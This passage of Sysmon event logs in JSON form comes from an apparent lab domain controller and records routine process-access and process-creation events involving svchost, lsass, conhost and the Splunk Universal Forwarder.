05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010E0D00300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010E0D00300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.531\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-0010E0D00300}\r\nSourceProcessId: 4032\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.531","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-0010E0D00300}","SourceProcessId":"4032","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.663\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nProcessId: 3908\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.663","ProcessGuid":"{A837DB8D-01C8-5F25-0000-00105AD50300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
